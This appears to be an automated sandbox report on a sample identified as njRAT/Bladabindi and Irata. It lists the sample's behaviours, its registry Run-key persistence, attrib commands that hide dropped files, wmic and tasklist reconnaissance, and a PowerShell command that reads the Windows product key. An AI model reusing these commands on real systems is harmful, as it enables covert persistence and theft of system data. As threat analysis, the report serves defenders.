Analysis Overview
SHA256
b79a1275b2ea72d2c67cf5377241ab159d2f5dd523f811196c16d50f4e65cf5c
Threat Level: Known bad
The file Net amp.EXE was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Irata payload
Irata
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Drops startup file
Loads dropped DLL
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: LoadsDriver
Suspicious use of WriteProcessMemory
Checks processor information in registry
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Views/modifies file attributes
Uses Volume Shadow Copy WMI provider
Suspicious use of SetWindowsHookEx
NTFS ADS
Suspicious use of FindShellTrayWindow
Enumerates processes with tasklist
Suspicious use of SendNotifyMessage
Collects information from the system
Suspicious behavior: EnumeratesProcesses
Detects videocard installed
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 20:09
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 20:08
Reported
2023-12-18 20:39
Platform
win7-20231129-en
Max time kernel
312s
Max time network
729s
Command Line
Signatures
Irata
Irata payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
njRAT/Bladabindi
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\Net amp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\System Settings Broker.exe" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Enumerates physical storage devices
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Net amp.exe
"C:\Users\Admin\AppData\Local\Temp\Net amp.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef66c9758,0x7fef66c9768,0x7fef66c9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1208 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2360 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1280 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1376 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3540 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3568 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3668 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3784 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3760 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x13f7f7688,0x13f7f7698,0x13f7f76a8
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe"
C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe
"C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3772 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2560 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2332 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2352 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=940 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2508 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3036 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=2072 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=2528 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=2052 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=3632 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4352 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4356 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4164 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4188 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=4264 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4072 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4464 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4500 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4560 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Users\Admin\Downloads\Creative EAX Settings.exe
"C:\Users\Admin\Downloads\Creative EAX Settings.exe"
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe"
C:\Users\Admin\Downloads\Creative EAX Settings.exe
"C:\Users\Admin\Downloads\Creative EAX Settings.exe"
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=4152 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=3956 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1044 --field-trial-handle=1176,6260504415997139111,14957227635753991944,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=NaN get ExecutablePath
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\resources\app.asar.unpacked\bind\main.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\more.com
more +1
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\system32\more.com
more +1
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1584 --field-trial-handle=1176,6260504415997139111,14957227635753991944,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Windows\system32\more.com
more +1
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1596 --field-trial-handle=1176,6260504415997139111,14957227635753991944,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get size
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=3572 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=3016 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=4420 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
